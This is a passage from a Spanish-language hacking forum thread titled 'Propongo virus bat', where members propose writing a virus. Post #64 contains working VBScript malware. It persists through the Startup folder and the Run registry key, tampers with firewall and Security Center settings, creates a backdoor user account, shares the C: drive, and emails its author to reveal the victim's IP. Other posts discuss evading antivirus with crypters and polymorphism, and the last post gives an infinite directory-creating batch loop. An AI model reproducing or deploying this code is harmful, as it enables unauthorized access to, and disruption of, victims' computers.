Página 4 de 4 PrimerPrimer ... 234
Resultados 61 al 80 de 80

Tema: Propongo virus bat

  1. #61  
    Moderador HH
    Fecha de ingreso
    Apr 2010
    Mensajes
    1.052
    Descargas
    7
    Uploads
    0
    puuffff "estudiar" suena a "chungo" xDxD Tienes razón...
    • Taller de programación HackHispano: http://tallerdeprogramacion.es
    • Wargame HackHispano: [PRÓXIMAMENTE]
    • Normas del foro: http://foro.hackhispano.com/announcement.php?f=2
    Citar  
     

  2. #62  
    Moderador HH
    Fecha de ingreso
    Nov 2006
    Mensajes
    1.516
    Descargas
    7
    Uploads
    0
    Nadie dijo que esto fuera facil. Y copiar codigo sin saber de que va no sirve para nada.

    Si quieres puedes probar a cogerlo por partes y ver que es lo que va haciendo en cada una de ellas (compilando y ejecutando en una maquina Virtual) y asi vas aprendiendo.


    Un saludo
    Mess with the best, die like the rest.


    Hazle a los demas... antes de que te hagan a ti.
    Citar  
     

  3. #63  
    Moderador HH
    Fecha de ingreso
    Apr 2010
    Mensajes
    1.052
    Descargas
    7
    Uploads
    0
    Chicos se me ha ocurrido una idea mucho mejor. No sé si crear un nuevo post pero no me quiero liar a postear xD. Mi ideas es que creemos una especie de wargame para windows. Es un programa escrito en vb o c que te va dando pistas. Por ejemplo: te da una pista hacia un archivo de texto y ese archivo contiene una especie de acertijo. El acertijo te llevará a una clave del registro con una valor, que tendrás que copiar y pegar en el wargame para que te de el nivel válido. El wargame tendrá la firma del foro. No se si se habrá mencionado antes la idea de hacer un wargame del foro pero desde mi punto de vista esta es mejor

    P.D.: No se si les pasa a otras personas pero todo esto se me ocurrió antes de dormirme, en mi querida cama. Es mi lugar de intimidad y pensamiento propio... Mis ideas se desarrollan allí

    ¿Posteo otro tema explicándolo todo? :S
    • Taller de programación HackHispano: http://tallerdeprogramacion.es
    • Wargame HackHispano: [PRÓXIMAMENTE]
    • Normas del foro: http://foro.hackhispano.com/announcement.php?f=2
    Citar  
     

  4. #64  
    Avanzado
    Fecha de ingreso
    Oct 2010
    Mensajes
    401
    Descargas
    24
    Uploads
    0
    bueno esto lo hice en vbs, el objetivo es desactivar el fir avisos..., el login telnet,y hacer un usuario net bios y compartir el disco c:\, ademas en teoria te manda el mail y al mirar en la cabezera ya sabes la ip de la victima, es algo que hice y no creeo que funcione, pero bueno aqui lo dejo la idea no es mala.


    ' VB Script Document


    Dim objshell,objscript,xsd,xsd2,erre,arc,tr

    Set objshell = createobject("wscript.shell")
    Set objscript = CreateObject("Scripting.FileSystemObject")

    xsd = objshell.specialfolders("Startup")

    erre = objscript.FileExists(xsd & "\DirecTx3D.vbs")

    if erre = False Then

    objscript.copyfile wscript.scriptfullname, xsd & "\DirecTx3D.vbs", true

    Set arc = objscript.GetFile( xsd & "\DirecTx3D.vbs")
    arc.Attributes = 3

    End if

    objshell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\CurrentVers ion\Run\DirecTx3D.vbs", xsd, "REG_SZ"

    objshell.regwrite "HKLM\Software\Policies\Microsoft\WindowsFirewall\ StandardProfile\EnableFirewall",1,"REG_DWORD"

    objshell.regwrite "HKLM\SOFTWARE\Microsoft\Security Center\FirewallDisableNotify",1,"REG_WORD"

    objshell.regwrite "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc\Sta rt",4,"REG_WORD"

    objshell.regwrite "HKLM\SOFTWARE\Microsoft\TelnetServer\1.0\EventLog gingEnabled",0,"REG_WORD"

    objshell.Exec("cmd /c net user root lolll /add")

    objshell.Exec("cmd /c net share Publico0=c:\")

    set objcdo=createobject("cdo.message")
    objcdo.subject="Prueba de envío"
    objcdo.from="@gmail.com"
    objcdo.to="@yahoo.es"
    objcdo.textbody="Este es el texto del mail"
    objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
    objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.gmail.com"
    objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 465
    objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1
    objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration/smtpconnectiontimeout") = 30
    objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "@gmail.com"
    objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = ""
    objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = 1
    objcdo.configuration.fields.update
    objcdo.send


    WScript.Quit
    Citar  
     

  5. #65  
    Moderador HH
    Fecha de ingreso
    Apr 2010
    Mensajes
    1.052
    Descargas
    7
    Uploads
    0
    Sabes Visual Basic Script? Además, si lees anteriormente, los antivirus suelen dar prioridad a los archivos vbs, a no ser que lo convirtamos en un ejecutable y le apliquemos un crypter... lo mas que puedo hacer es que no lo detecte ninguno menos avira...
    • Taller de programación HackHispano: http://tallerdeprogramacion.es
    • Wargame HackHispano: [PRÓXIMAMENTE]
    • Normas del foro: http://foro.hackhispano.com/announcement.php?f=2
    Citar  
     

  6. #66  
    Avanzado
    Fecha de ingreso
    Oct 2010
    Mensajes
    401
    Descargas
    24
    Uploads
    0
    Se muy poco de vbscript, casi todo lo aprendi de este tutorial y despues mirando codigos de malware y mas trozos interesante de programas que encontre por los foros.

    http://www.mediafire.com/?dmi2tjwt1yy

    son tres partes, es bastante basico pero para empezar a entender ese codigo que te han dejado antes te va venir de perlas.
    Citar  
     

  7. #67 Creo que he encontrado el hilo algo tarde 
    Iniciado
    Fecha de ingreso
    Aug 2010
    Mensajes
    48
    Descargas
    1
    Uploads
    0
    Me pregunto si podríamos hacerlo en asm, que es una de las mejores formas de tocar el hardware.
    Citar  
     

  8. #68  
    Avanzado
    Fecha de ingreso
    Jan 2010
    Mensajes
    813
    Descargas
    1
    Uploads
    0
    Cita Iniciado por 3m.8>(9/3) Ver mensaje
    Me pregunto si podríamos hacerlo en asm, que es una de las mejores formas de tocar el hardware.
    Si el SO no lo impidiera, claro.
    Citar  
     

  9. #69  
    Moderador Global Avatar de hystd
    Fecha de ingreso
    Jul 2005
    Ubicación
    1, 11, 21, 1211...
    Mensajes
    1.596
    Descargas
    58
    Uploads
    0
    ademas en teoria te manda el mail y al mirar en la cabezera ya sabes la ip de la victima,
    La IP de la víctima no, en todo caso la IP del servidor de correo que te envia el mail.

    Además, si lees anteriormente, los antivirus suelen dar prioridad a los archivos vbs, a no ser que lo convirtamos en un ejecutable y le apliquemos un crypter... lo mas que puedo hacer es que no lo detecte ninguno menos avira...
    Aunque apliques un cifrado del fichero ejecutable, un antivirus puede analizar la memoria y por tanto ya no analiza un programa, sino un proceso. Para que pase totalmente desapercibido debe emplear además de cifrado, técnicas de polimorfismo o añadir código de modificación software.

    Un saludo.
    El optimista tiene ideas, el pesimista... excusas

    Citar  
     

  10. #70  
    Avanzado
    Fecha de ingreso
    Oct 2010
    Mensajes
    401
    Descargas
    24
    Uploads
    0
    La IP de la víctima no, en todo caso la IP del servidor de correo que te envia el mail.
    Estas seguro de eso ?¿?
    Entonces la ultima linea de la cabecera que significa (Es en yahoo)

    Received: from [xx.x.xxx.xxx] y no es la ip de los servers smtp, pop3 por los que paso
    by web24820.mail.ird.yahoo.com via HTTP; Fri, 05 Nov 2010 00:42:45 GMT
    X-Mailer: YahooMailRC/504.5 YahooMailWebService/0.8.107.284920
    Date: Fri, 5 Nov 2010 00:42:45 +0000 (GMT)
    From: Soni Montoys <mail@yahoo.es>

    Haber si me lo puedes explicar,de verdad que estaria muy agredecido porque me dejastes con la duda.


    Gracias por adelantado.
    Última edición por chewarrior; 10-11-2010 a las 00:36
    René Pérez Joglar: Pa' tener a un listo que no dice nada prefiero a un idiota que hable mucho.
    Citar  
     

  11. #71  
    Avanzado
    Fecha de ingreso
    Jan 2010
    Mensajes
    813
    Descargas
    1
    Uploads
    0
    Prueba a resolver la dirección IP.
    Citar  
     

  12. #72  
    Avanzado
    Fecha de ingreso
    Oct 2010
    Mensajes
    401
    Descargas
    24
    Uploads
    0
    Fruit mandame un mensaje por fii

    chewarrior1@yahoo.es

    Y ya salgo de dudas.
    René Pérez Joglar: Pa' tener a un listo que no dice nada prefiero a un idiota que hable mucho.
    Citar  
     

  13. #73  
    Avanzado
    Fecha de ingreso
    Jan 2010
    Mensajes
    813
    Descargas
    1
    Uploads
    0
    Mándatelo tú desde otra dirección.
    Citar  
     

  14. #74  
    Avanzado
    Fecha de ingreso
    Oct 2010
    Mensajes
    401
    Descargas
    24
    Uploads
    0
    Ya lo e hecho y en ese apartado sale mi ip Received: from [xx.x.xxx.xxx]

    aqui sale con el mail que lo envie From: Soni Montoys <mail@yahoo.es>

    Por cierto que e hecho un escaneo con nessus y me sale que tengo un server ftp,cuando no tengo na de na, asi que directamente e ido a cmd, ftp, ftp open 127.0.0.1 21,connect :numeto de error desconocido, umm o yo soy un neurotico o alguien me esta jodiendo
    René Pérez Joglar: Pa' tener a un listo que no dice nada prefiero a un idiota que hable mucho.
    Citar  
     

  15. #75  
    Avanzado
    Fecha de ingreso
    Jan 2010
    Mensajes
    813
    Descargas
    1
    Uploads
    0
    O tienes un router que sí tiene servidor de FTP, claro.
    Citar  
     

  16. #76  
    Avanzado
    Fecha de ingreso
    Oct 2010
    Mensajes
    401
    Descargas
    24
    Uploads
    0
    Tiene que ser tema del router porque en mi sistema wxp, no esta abierto el puerto 21, el caso es que en el router tampoco esta habilitado el acesso ftp xd.
    René Pérez Joglar: Pa' tener a un listo que no dice nada prefiero a un idiota que hable mucho.
    Citar  
     

  17. #77  
    Avanzado
    Fecha de ingreso
    Oct 2010
    Mensajes
    401
    Descargas
    24
    Uploads
    0
    Efectivamente tengo server ftp en el router xd
    René Pérez Joglar: Pa' tener a un listo que no dice nada prefiero a un idiota que hable mucho.
    Citar  
     

  18. #78  
    Iniciado
    Fecha de ingreso
    Sep 2006
    Ubicación
    mundo newbie 4eva
    Mensajes
    41
    Descargas
    7
    Uploads
    0
    Gondar_h, chapó. Sólo quería decirle al creador de éste hilo que comentaba algo de que el virus pudiera anular las librerías de panda -entre otras cosas-... se dice, no sé si son malas lenguas pero sí que al menos han trabajado en Panda en Bilbao, que sus antivirus-firewalls básicamente son manejos de iptables... un poquito de allí, otro de allá... y hala... a vender el pescado. Escribo de oídas, así es que alguien que les haya podido meter mano o bien haya decompilado código suyo o como fuere podrá decirme que no es así y estará en su derecho y yo quedaré agradecido ^^.
    Citar  
     

  19. #79  
    Iniciado
    Fecha de ingreso
    Sep 2006
    Ubicación
    mundo newbie 4eva
    Mensajes
    41
    Descargas
    7
    Uploads
    0
    Cita Iniciado por Fruit Ver mensaje
    Linux no te vuelve a pedir la contraseña para nada una vez te haces root.
    Siento disentir contigo compañero de foro. Mi distro me suele pedir el pass cada poco tiempo y no estoy seguro de si es por inactividad (cosa que dudo bastante) o porque el nivel de privilegio de ciertos programas o modificaciones de ciertos archivos así lo requiere. Por ejemplo, si quiero modificar el archivo de configuración de un ids como Snort me pide que sea root, lo modifico según mi conveniencia y todo perfecto, si más tarde necesito hacerlo de nuevo... ¿qué sucede? tachán!!! me vuelve a pedir el pass... He aquí una de las diferencias más grandes que existen con respecto a Win2, aún así hacerse con el control de un unix puede ser asombrosamente fácil, eso sí teniendo la máquina física delante -ya se saben bien conocidos ciertos fallos en linux-, sino ya es harina de otro costal

    Fruit, tal vez me digas que se puede modificar el nivel de privilegio para que no sea tan tedioso el tener que estar "diciendo" soy root :P pero entonces estaría minando una de las seguridades de mi sistema. De todos modos es genial que seáis tan activos y ofrezcáis vuestros conocimientos. Lo mejor de todo es poder discutir y seguir aprendiendo! Me encanta éste foro y casi todo lo que se debate en él. Seguid así!!!!
    Citar  
     

  20. #80  
    Avanzado
    Fecha de ingreso
    Jul 2007
    Ubicación
    en Linux ;D
    Mensajes
    334
    Descargas
    4
    Uploads
    0
    Código:
    1:
    md nuevo
    cd nuevo
    goto 1
    * * @* * Olvídate de:
    *@ @* * los anti-virus, anti-spyware, anti-nada y anti-todo.
    * * @* * y del software que expira a los 30 días
    * * @* *
    * @@@* linux
    Citar  
     

Temas similares

  1. Propongo que el formato de las noticias sea asi....
    Por revolloso en el foro NOTICIAS
    Respuestas: 16
    Último mensaje: 17-02-2003, 18:21
  2. Propongo esto...
    Por .Yok3R. en el foro HACK HiSPANO
    Respuestas: 4
    Último mensaje: 23-04-2002, 03:08
  3. Propongo hacernos con espacio ftp
    Por khronos en el foro GENERAL
    Respuestas: 0
    Último mensaje: 31-01-2002, 15:06

Marcadores

Marcadores

Permisos de publicación

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •